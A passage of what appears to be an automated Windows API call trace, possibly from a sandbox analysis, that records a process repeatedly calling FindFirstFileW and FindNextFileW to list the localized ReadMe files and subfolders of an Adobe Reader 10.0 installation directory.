nFileSizeLow=0x43c7, dwReserved0=0x0, dwReserved1=0x0, cFileName="Lisezmoi.htm", cAlternateFileName="")) returned 1 [0141.560] FindNextFileW (in: hFindFile=0xb7f690, lpFindFileData=0x8f6ed04 | out: lpFindFileData=0x8f6ed04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81ed8ae0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x41fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="Llegiu-me.htm", cAlternateFileName="LLEGIU~1.HTM")) returned 1 [0141.560] FindNextFileW (in: hFindFile=0xb7f690, lpFindFileData=0x8f6ed04 | out: lpFindFileData=0x8f6ed04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x434e, dwReserved0=0x0, dwReserved1=0x0, cFileName="LueMinut.htm", cAlternateFileName="")) returned 1 [0141.560] FindNextFileW (in: hFindFile=0xb7f690, lpFindFileData=0x8f6ed04 | out: lpFindFileData=0x8f6ed04*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf40b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x83849600, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x83849600, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reader", cAlternateFileName="")) returned 1 [0141.561] FindNextFileW (in: hFindFile=0xb7f690, lpFindFileData=0x8f6ed04 | out: lpFindFileData=0x8f6ed04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7feb61e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4176, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReadMe.htm", cAlternateFileName="")) returned 1 [0141.561] FindNextFileW (in: hFindFile=0xb7f690, lpFindFileData=0x8f6ed04 | out: lpFindFileData=0x8f6ed04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x3f71, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReadMeCS.htm", cAlternateFileName="")) returned 1 [0141.561] FindNextFileW (in: hFindFile=0xb7f690, lpFindFileData=0x8f6ed04 | out: lpFindFileData=0x8f6ed04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x3fa1, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReadMeCT.htm", cAlternateFileName="")) returned 1 [0141.561] FindNextFileW (in: hFindFile=0xb7f690, lpFindFileData=0x8f6ed04 | out: lpFindFileData=0x8f6ed04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x80815880, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4623, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReadMeCZE.htm", cAlternateFileName="REE3F7~1.HTM")) returned 1 [0141.561] FindNextFileW (in: hFindFile=0xb7f690, lpFindFileData=0x8f6ed04 | out: lpFindFileData=0x8f6ed04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x80861b40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x42aa, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReadMeHRV.htm", cAlternateFileName="RE2D2E~1.HTM")) returned 1 [0141.561] FindNextFileW (in: hFindFile=0xb7f690, lpFindFileData=0x8f6ed04 | out: lpFindFileData=0x8f6ed04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x807ef720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4274, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReadMeHUN.htm", cAlternateFileName="RE50AF~1.HTM")) returned 1 [0141.562] FindNextFileW (in: hFindFile=0xb7f690, lpFindFileData=0x8f6ed04 | out: lpFindFileData=0x8f6ed04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x17b8, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReadMeJ.htm", cAlternateFileName="")) returned 1 [0141.562] FindNextFileW (in: hFindFile=0xb7f690, lpFindFileData=0x8f6ed04 | out: lpFindFileData=0x8f6ed04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4090, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReadMeK.htm", cAlternateFileName="")) returned 1 [0141.562] FindNextFileW (in: hFindFile=0xb7f690, lpFindFileData=0x8f6ed04 | out: lpFindFileData=0x8f6ed04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x807ef720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4444, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReadMePOL.htm", cAlternateFileName="RECE99~1.HTM")) returned 1 [0141.562] FindNextFileW (in: hFindFile=0xb7f690, lpFindFileData=0x8f6ed04 | out: lpFindFileData=0x8f6ed04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x807ef720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4318, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReadMeRUM.htm", cAlternateFileName="README~4.HTM")) returned 1 [0141.562] FindNextFileW (in: hFindFile=0xb7f690, lpFindFileData=0x8f6ed04 | out: lpFindFileData=0x8f6ed04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x807ef720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4872, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReadMeRUS.htm", cAlternateFileName="README~3.HTM")) returned 1 [0141.562] FindNextFileW (in: hFindFile=0xb7f690, lpFindFileData=0x8f6ed04 | out: lpFindFileData=0x8f6ed04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x807ef720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x43b7, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReadMeSKY.htm", cAlternateFileName="README~2.HTM")) returned 1 [0141.562] FindNextFileW (in: hFindFile=0xb7f690, lpFindFileData=0x8f6ed04 | out: lpFindFileData=0x8f6ed04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x807ef720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4995, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReadMeUKR.htm", cAlternateFileName="README~1.HTM")) returned 1 [0141.562] FindNextFileW (in: hFindFile=0xb7f690, lpFindFileData=0x8f6ed04 | out: lpFindFileData=0x8f6ed04*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cfb2f60, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x833608a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x833608a0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Resource", cAlternateFileName="")) returned 1 [0141.563] FindNextFileW (in: hFindFile=0xb7f690, lpFindFileData=0x8f6ed04 | out: lpFindFileData=0x8f6ed04*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf66ca0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7cf66ca0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7cf66ca0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup Files", cAlternateFileName="SETUPF~1")) returned 1 [0141.563] FindNextFileW (in: hFindFile=0xb7f690, lpFindFileData=0x8f6ed04 | out: lpFindFileData=0x8f6ed04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x41c1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Vigtigt.htm", cAlternateFileName="")) returned 1 [0141.563] FindNextFileW (in: hFindFile=0xb7f690, lpFindFileData=0x8f6ed04 | out: lpFindFileData=0x8f6ed04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x41b2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Viktig.htm", cAlternateFileName="")) returned 1 [0141.563] FindNextFileW (in: hFindFile=0xb7f690, lpFindFileData=0x8f6ed04 | out: lpFindFileData=0x8f6ed04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4214, dwReserved0=0x0, dwReserved1=0x0, cFileName="Viktigt.htm", cAlternateFileName="")) returned 1 [0141.563] FindNextFileW (in: hFindFile=0xb7f690, lpFindFileData=0x8f6ed04 | out: lpFindFileData=0x8f6ed04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0141.563] FindClose (in: hFindFile=0xb7f690 | out: hFindFile=0xb7f690) returned 1 [0141.563] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ef8c) returned 1 [0141.563] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ef98) returned 1 [0141.563] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6efcc) returned 1 [0141.563] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0", nBufferLength=0x105, lpBuffer=0x8f6ead4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0", lpFilePart=0x0) returned 0x28 [0141.564] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\", nBufferLength=0x105, lpBuffer=0x8f6eaa8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\", lpFilePart=0x0) returned 0x29 [0141.564] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*", lpFindFileData=0x8f6ecf4 | out: lpFindFileData=0x8f6ecf4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf40b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81ed8ae0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81ed8ae0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f690 [0141.564] FindNextFileW (in: hFindFile=0xb7f690, lpFindFileData=0x8f6ed04 | out: lpFindFileData=0x8f6ed04*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf40b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81ed8ae0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81ed8ae0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0141.564] FindNextFileW (in: hFindFile=0xb7f690, lpFindFileData=0x8f6ed04 | out: lpFindFileData=0x8f6ed04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x807ef720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4268, dwReserved0=0x0, dwReserved1=0x0, cFileName="Benioku.htm", cAlternateFileName="")) returned 1 [0141.564] FindNextFileW (in: hFindFile=0xb7f690, lpFindFileData=0x8f6ed04 | out: lpFindFileData=0x8f6ed04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x807ef720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x42ba, dwReserved0=0x0, dwReserved1=0x0, cFileName="Berime.htm", cAlternateFileName="")) returned 1 [0141.564] FindNextFileW (in: hFindFile=0xb7f690, lpFindFileData=0x8f6ed04 | out: lpFindFileData=0x8f6ed04*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ffe6ce0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7ffe6ce0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7ffe6ce0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Esl", cAlternateFileName="")) returned 1 [0141.564] FindNextFileW (in: hFindFile=0xb7f690, lpFindFileData=0x8f6ed04 | out: lpFindFileData=0x8f6ed04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d67db00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81ed8ae0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9d67db00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4288, dwReserved0=0x0, dwReserved1=0x0, cFileName="IrakHau.htm", cAlternateFileName="")) returned 1 [0141.565] FindNextFileW (in: hFindFile=0xb7f690, lpFindFileData=0x8f6ed04 | out: lpFindFileData=0x8f6ed04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7feb61e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x423b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Leame.htm", cAlternateFileName="")) returned 1 [0141.565] FindNextFileW (in: hFindFile=0xb7f690, lpFindFileData=0x8f6ed04 | out: lpFindFileData=0x8f6ed04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x41e3, dwReserved0=0x0, dwReserved1=0x0, cFileName="LeesMij.htm", cAlternateFileName="")) returned 1 [0141.565] FindNextFileW (in: hFindFile=0xb7f690, lpFindFileData=0x8f6ed04 | out: lpFindFileData=0x8f6ed04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4289, dwReserved0=0x0, dwReserved1=0x0, cFileName="Leggimi.htm", cAlternateFileName="")) returned 1 [0141.565] FindNextFileW (in: hFindFile=0xb7f690, lpFindFileData=0x8f6ed04 | out: lpFindFileData=0x8f6ed04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7feb61e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4273, dwReserved0=0x0, dwReserved1=0x0, cFileName="LeiaMe.htm", cAlternateFileName="")) returned 1 [0141.565] FindNextFileW (in: hFindFile=0xb7f690, lpFindFileData=0x8f6ed04 | out: lpFindFileData=0x8f6ed04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x42b6, dwReserved0=0x0, dwReserved1=0x0, cFileName="Liesmich.htm", cAlternateFileName="")) returned 1 [0141.565] FindNextFileW (in: hFindFile=0xb7f690, lpFindFileData=0x8f6ed04 | out: lpFindFileData=0x8f6ed04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7f82a560, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x43c7, dwReserved0=0x0, dwReserved1=0x0, cFileName="Lisezmoi.htm", cAlternateFileName="")) returned 1 [0141.566] FindNextFileW (in: hFindFile=0xb7f690, lpFindFileData=0x8f6ed04 | out: lpFindFileData=0x8f6ed04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81ed8ae0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x41fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="Llegiu-me.htm", cAlternateFileName="LLEGIU~1.HTM")) returned 1 [0141.566] FindNextFileW (in: hFindFile=0xb7f690, lpFindFileData=0x8f6ed04 | out: lpFindFileData=0x8f6ed04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x434e, dwReserved0=0x0, dwReserved1=0x0, cFileName="LueMinut.htm", cAlternateFileName="")) returned 1 [0141.566] FindNextFileW (in: hFindFile=0xb7f690, lpFindFileData=0x8f6ed04 | out: lpFindFileData=0x8f6ed04*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf40b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x83849600, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x83849600, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reader", cAlternateFileName="")) returned 1 [0141.566] FindNextFileW (in: hFindFile=0xb7f690, lpFindFileData=0x8f6ed04 | out: lpFindFileData=0x8f6ed04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7feb61e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4176, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReadMe.htm", cAlternateFileName="")) returned 1 [0141.566] FindNextFileW (in: hFindFile=0xb7f690, lpFindFileData=0x8f6ed04 | out: lpFindFileData=0x8f6ed04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x3f71, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReadMeCS.htm", cAlternateFileName="")) returned 1 [0141.566] FindNextFileW (in: hFindFile=0xb7f690, lpFindFileData=0x8f6ed04 | out: lpFindFileData=0x8f6ed04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x3fa1, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReadMeCT.htm", cAlternateFileName="")) returned 1 [0141.566] FindNextFileW (in: hFindFile=0xb7f690, lpFindFileData=0x8f6ed04 | out: lpFindFileData=0x8f6ed04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x80815880, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4623, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReadMeCZE.htm", cAlternateFileName="REE3F7~1.HTM")) returned 1 [0141.567] FindNextFileW (in: hFindFile=0xb7f690, lpFindFileData=0x8f6ed04 | out: lpFindFileData=0x8f6ed04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x80861b40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x42aa, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReadMeHRV.htm", cAlternateFileName="RE2D2E~1.HTM")) returned 1 [0141.567] FindNextFileW (in: hFindFile=0xb7f690, lpFindFileData=0x8f6ed04 | out: lpFindFileData=0x8f6ed04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x807ef720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4274, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReadMeHUN.htm", cAlternateFileName="RE50AF~1.HTM")) returned 1 [0141.567] FindNextFileW (in: hFindFile=0xb7f690, lpFindFileData=0x8f6ed04 | out: lpFindFileData=0x8f6ed04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x17b8, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReadMeJ.htm", cAlternateFileName="")) returned 1 [0141.567] FindNextFileW (in: hFindFile=0xb7f690, lpFindFileData=0x8f6ed04 | out: lpFindFileData=0x8f6ed04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, 